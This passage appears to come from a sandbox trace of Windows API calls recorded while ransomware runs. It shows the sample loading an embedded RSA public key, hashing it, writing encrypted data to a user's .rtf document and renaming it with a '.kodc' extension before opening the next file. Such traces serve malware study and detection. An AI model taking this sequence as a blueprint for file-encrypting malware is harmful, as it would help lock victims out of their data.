lpDistanceToMoveHigh=0x0) returned 0x0 [0098.539] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xecc, lpOverlapped=0x0) returned 1 [0098.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.539] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.540] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.540] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.540] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.540] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.540] GetLastError () returned 0x0 [0098.541] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.541] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.541] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.541] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.541] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xed0) returned 0x9b9de98 [0098.541] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d2a0 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa48 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d2e8 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa60 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa90 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaa8 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.542] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa90 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaa8 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aaa8 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aa90 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaa8 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa90 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.543] GetCurrentThreadId () returned 0x42c [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f088 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.543] GetCurrentThreadId () returned 0x42c [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa90 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaa8 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa78 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aac0 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa90 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa90 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa90 | out: hHeap=0x630000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aac0 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaa8 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa78 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa60 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d2e8 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.547] WriteFile (in: hFile=0x5cc, lpBuffer=0x9b9de98*, nNumberOfBytesToWrite=0xec7, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9b9de98*, lpNumberOfBytesWritten=0x9e2fb14*=0xec7, lpOverlapped=0x0) returned 1 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9de98 | out: hHeap=0x630000) returned 1 [0098.547] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xecc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.547] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.547] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.548] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.548] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.548] CloseHandle (hObject=0x5cc) returned 1 [0098.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.551] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\P3UG-u5cYJO8Spn.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p3ug-u5cyjo8spn.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\P3UG-u5cYJO8Spn.rtf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p3ug-u5cyjo8spn.rtf.kodc")) returned 1 [0098.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.552] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.554] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x788010, ftCreationTime.dwHighDateTime=0x1d5608d, ftLastAccessTime.dwLowDateTime=0xe84b8ed0, ftLastAccessTime.dwHighDateTime=0x1d56aad, ftLastWriteTime.dwLowDateTime=0xe84b8ed0, ftLastWriteTime.dwHighDateTime=0x1d56aad, nFileSizeHigh=0x0, nFileSizeLow=0xce2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PGbnRpgVWp-kAm_f2.xlsx", cAlternateFileName="PGBNRP~1.XLS")) returned 1 [0098.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.554] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PGbnRpgVWp-kAm_f2.xlsx") returned=".xlsx" [0098.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PGbnRpgVWp-kAm_f2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pgbnrpgvwp-kam_f2.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 